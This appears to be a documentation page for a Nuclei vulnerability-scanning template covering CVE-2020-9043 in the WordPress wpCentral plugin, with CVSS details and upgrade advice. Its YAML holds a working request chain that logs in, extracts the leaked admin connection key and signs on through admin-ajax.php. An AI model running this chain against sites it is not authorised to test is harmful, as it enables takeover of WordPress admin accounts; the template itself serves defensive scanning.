WordPress wpCentral <1.5.1 - Information Disclosure
ID: CVE-2020-9043
Severity: high
Author: scent2d
Tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan
Description
Section titled “Description”WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: CVE-2020-9043
info: name: WordPress wpCentral <1.5.1 - Information Disclosure author: scent2d severity: high description: | WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin. remediation: | Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/10074 - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 - https://wordpress.org/plugins/wp-central/#developers - https://nvd.nist.gov/vuln/detail/CVE-2020-9043 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-9043 cwe-id: CWE-200 epss-score: 0.04173 epss-percentile: 0.91333 cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 vendor: wpcentral product: wpcentral framework: wordpress tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/index.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 Host: {{Hostname}} - | GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 Host: {{Hostname}}
host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - "contains(header_4, 'text/html')" - "status_code_4 == 200" - "contains(body_4, 'wpCentral Connection Key')" - contains(body_4, "pagenow = \'dashboard\'") condition: and
extractors: - type: regex name: authkey group: 1 regex: - 'style="word-wrap:break-word;">([a-z0-9]+)' internal: true part: body
- type: regex name: nonce group: 1 regex: - '_wpnonce=([0-9a-z]+)' internal: true part: body# digest: 4b0a00483046022100f99ab6d09a1def9791b5d346ef0a0a9056f765828fccc7984bd622f0d355b7e4022100f6d618f1274eccc1864009b86f17195d7d03bf9b252975544b2992d5281ced20:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-9043.yaml"